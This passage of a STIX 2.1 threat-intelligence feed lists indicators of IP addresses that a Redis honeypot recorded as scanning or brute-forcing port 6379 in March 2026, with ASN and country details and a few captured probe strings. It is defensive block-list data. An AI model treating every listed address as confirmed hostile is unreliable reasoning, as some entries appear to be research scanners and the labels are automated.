      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.154.25.117']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T06:25:13.000Z",
      "valid_until": "2026-04-05T06:25:11.000Z"
    },
    {
      "created": "2026-03-04T07:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=40021; asn_org=Contabo Inc.; redis_cmd_hits=0",
      "id": "indicator--8f27e124-add1-4d65-b0d3-69adae7369f8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T07:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.93.178.1']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T07:25:06.000Z",
      "valid_until": "2026-04-05T07:25:06.000Z"
    },
    {
      "created": "2026-03-04T09:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=141998; asn_org=China Telecom; redis_cmd_hits=0",
      "id": "indicator--5dbe1268-4f10-4bcd-aa4f-ea2a6a33e027",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T09:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '125.74.55.217']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T09:25:07.000Z",
      "valid_until": "2026-04-05T09:25:05.000Z"
    },
    {
      "created": "2026-03-04T09:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38283; asn_org=CHINANET SiChuan Telecom Internet Data Center; redis_cmd_hits=0",
      "id": "indicator--51d9ebf3-56fc-42aa-9e17-1301673254e2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T09:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '221.236.21.55']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T09:25:07.000Z",
      "valid_until": "2026-04-05T09:25:05.000Z"
    },
    {
      "created": "2026-03-04T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--fb4ad074-e7ef-417e-9bef-c9c9ce75b755",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.121.80.160']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T11:25:13.000Z",
      "valid_until": "2026-04-05T11:25:12.000Z"
    },
    {
      "created": "2026-03-04T12:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; redis_cmd_hits=0",
      "id": "indicator--04fda896-e167-44b0-b209-1200623a9270",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T12:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '50.232.194.55']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T12:25:09.000Z",
      "valid_until": "2026-04-05T12:25:05.000Z"
    },
    {
      "created": "2026-03-04T12:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--c7e96d16-cee6-4ab1-8096-06e9e4477f16",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T12:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.232.30']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T12:25:09.000Z",
      "valid_until": "2026-04-05T12:25:05.000Z"
    },
    {
      "created": "2026-03-04T13:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--70dd392f-831b-4460-be07-4f4baf927266",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T13:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.144.239.78']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T13:25:06.000Z",
      "valid_until": "2026-04-05T13:25:05.000Z"
    },
    {
      "created": "2026-03-04T13:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134768; asn_org=CHINANET SHAANXI province Cloud Base network; redis_cmd_hits=0",
      "id": "indicator--1484447e-f44d-4929-9be6-b0c37c5ea7b0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T13:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.111.158.225']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T13:25:06.000Z",
      "valid_until": "2026-04-05T13:25:05.000Z"
    },
    {
      "created": "2026-03-04T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--506fda16-4386-444b-87a1-32533aee0f29",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.203.30.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T14:25:13.000Z",
      "valid_until": "2026-04-05T14:25:12.000Z"
    },
    {
      "created": "2026-03-04T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--78b56f41-796b-4072-a80c-4180a9aa4236",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '184.105.247.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T14:25:13.000Z",
      "valid_until": "2026-04-05T14:25:12.000Z"
    },
    {
      "created": "2026-03-04T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--811359b6-ae27-4843-9545-88d9a92dcb29",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '184.105.247.252']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T14:25:13.000Z",
      "valid_until": "2026-04-05T14:25:12.000Z"
    },
    {
      "created": "2026-03-04T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=RU; asn=214664; asn_org=JSC Buduschee; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0",
      "id": "indicator--7bf855b2-2c0f-4087-9891-5b8464f4f553",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.91.64.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T15:25:13.000Z",
      "valid_until": "2026-04-05T15:25:12.000Z"
    },
    {
      "created": "2026-03-04T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58519; asn_org=Cloud Computing Corporation; redis_cmd_hits=0",
      "id": "indicator--3aefed46-f5c1-4d75-a2e4-fd9be341e368",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '140.246.124.160']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T17:25:13.000Z",
      "valid_until": "2026-04-05T17:25:12.000Z"
    },
    {
      "created": "2026-03-04T18:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--221c2636-d37a-4ec1-a6c0-678c58f6dcf5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T18:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '81.29.142.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T18:25:12.000Z",
      "valid_until": "2026-04-05T18:25:12.000Z"
    },
    {
      "created": "2026-03-04T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--3dcf5d48-0f64-411c-8f16-371d0dbbd0c1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.209.215']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T20:25:13.000Z",
      "valid_until": "2026-04-05T20:25:12.000Z"
    },
    {
      "created": "2026-03-04T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--59085736-d867-43f6-bf97-0f1cf25a28af",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.199.65']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T20:25:13.000Z",
      "valid_until": "2026-04-05T20:25:12.000Z"
    },
    {
      "created": "2026-03-04T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--cb68f15f-b216-4df7-b27f-3f7ff0eb6176",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.182.172.160']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T21:25:13.000Z",
      "valid_until": "2026-04-05T21:25:12.000Z"
    },
    {
      "created": "2026-03-04T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--18b133d8-34b1-4a1b-a219-342246c8ef38",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '125.94.106.113']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T22:25:13.000Z",
      "valid_until": "2026-04-05T22:25:12.000Z"
    },
    {
      "created": "2026-03-04T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=59; ports=6379; cc=HK; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--64dffaf1-4a1a-4c00-be3e-b835d0f95302",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '152.32.128.169']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T22:25:13.000Z",
      "valid_until": "2026-04-05T22:25:12.000Z"
    },
    {
      "created": "2026-03-04T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--c86b86f3-f650-40de-bc61-e7d8b0055c80",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-04T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.191']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T22:25:13.000Z",
      "valid_until": "2026-04-05T22:25:12.000Z"
    },
    {
      "created": "2026-03-04T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=RU; asn=49392; asn_org=LLC Baxet; redis_cmd_hits=0",
      "id": "indicator--0b8d288d-f2cd-47ea-9bb2-d54f9ce255f0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-04T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '46.29.167.115']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-04T22:25:13.000Z",
      "valid_until": "2026-04-05T22:25:12.000Z"
    },
    {
      "created": "2026-03-05T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--5bb1fa9b-ccf6-4641-86ad-f2d32271bfda",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.4']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T00:25:13.000Z",
      "valid_until": "2026-04-06T00:25:12.000Z"
    },
    {
      "created": "2026-03-05T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--45b54eef-0563-47cd-a18d-9982613cf8c7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T00:25:13.000Z",
      "valid_until": "2026-04-06T00:25:12.000Z"
    },
    {
      "created": "2026-03-05T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--a15b0204-6127-4617-af39-bb90f99b2240",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '146.56.175.64']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T01:25:13.000Z",
      "valid_until": "2026-04-06T01:25:12.000Z"
    },
    {
      "created": "2026-03-05T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=RU; asn=44050; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0",
      "id": "indicator--6face142-5525-47fe-9bfc-ce797db0f2cc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '95.215.0.144']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T01:25:13.000Z",
      "valid_until": "2026-04-06T01:25:12.000Z"
    },
    {
      "created": "2026-03-05T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--237bf5a8-168b-4b3a-8167-7f81f8df985a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.185.132.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T02:25:13.000Z",
      "valid_until": "2026-04-06T02:25:12.000Z"
    },
    {
      "created": "2026-03-05T04:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=BD; asn=63984; asn_org=Nexdecade Technology Pvt. LTD; redis_cmd_hits=0",
      "id": "indicator--b93eb85e-7f1e-4987-8e74-9a7eefb133db",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T04:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.57.151.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T04:25:07.000Z",
      "valid_until": "2026-04-06T04:25:06.000Z"
    },
    {
      "created": "2026-03-05T04:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=40021; asn_org=Contabo Inc.; redis_cmd_hits=0",
      "id": "indicator--11b4b616-7663-4480-95d1-aaaeba7b95aa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T04:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.239.245.254']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T04:25:07.000Z",
      "valid_until": "2026-04-06T04:25:06.000Z"
    },
    {
      "created": "2026-03-05T05:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--8c2f98c3-7080-41cb-8fc4-3f6002181d03",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T05:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.65.194.166']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T05:25:14.000Z",
      "valid_until": "2026-04-06T05:25:12.000Z"
    },
    {
      "created": "2026-03-05T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--e3c985a3-03ca-4a47-8cea-e62d0ea9570f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '140.245.70.130']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T06:25:13.000Z",
      "valid_until": "2026-04-06T06:25:12.000Z"
    },
    {
      "created": "2026-03-05T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--acc3be54-69ff-49eb-88b8-77d09f76aa46",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.112']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T06:25:13.000Z",
      "valid_until": "2026-04-06T06:25:12.000Z"
    },
    {
      "created": "2026-03-05T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0c1c19a3-f254-4bc4-8c1d-259a992af4eb",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.209.75.100']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T07:25:13.000Z",
      "valid_until": "2026-04-06T07:25:12.000Z"
    },
    {
      "created": "2026-03-05T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=22; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--6adb11bb-ff88-4a9c-a46a-4752fc84d77b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.223.143.157']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T07:25:13.000Z",
      "valid_until": "2026-04-06T07:25:12.000Z"
    },
    {
      "created": "2026-03-05T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=100; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"...L.......b.y]...y..n....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group\"",
      "id": "indicator--2a7c4707-a0ef-454f-ba7e-3bc9e7cec03e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.116.101.220']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T07:25:13.000Z",
      "valid_until": "2026-04-06T07:25:12.000Z"
    },
    {
      "created": "2026-03-05T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--b1b347e4-9545-4048-8c6b-b2c7b1ea80ef",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.142.28.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T08:25:13.000Z",
      "valid_until": "2026-04-06T08:25:12.000Z"
    },
    {
      "created": "2026-03-05T09:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=214996; asn_org=netcup GmbH; redis_cmd_hits=0",
      "id": "indicator--c208ca69-55a7-4b01-b763-0b429dbbb566",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T09:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '152.53.171.92']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T09:25:07.000Z",
      "valid_until": "2026-04-06T09:25:06.000Z"
    },
    {
      "created": "2026-03-05T10:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--be65d27e-8e1a-47a1-96e7-606d03b1b3a7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T10:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.134.230']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T10:25:13.000Z",
      "valid_until": "2026-04-06T10:25:12.000Z"
    },
    {
      "created": "2026-03-05T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--4ea05228-b316-4d56-a5d0-cffdabc7438c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-05T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.107']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-05T12:25:07.000Z",
      "valid_until": "2026-04-06T12:25:06.000Z"
    },
    {
      "created": "2026-03-05T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--d1085c4e-92ec-45bc-a779-092086132fff",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-05T12:25:07.000Z",
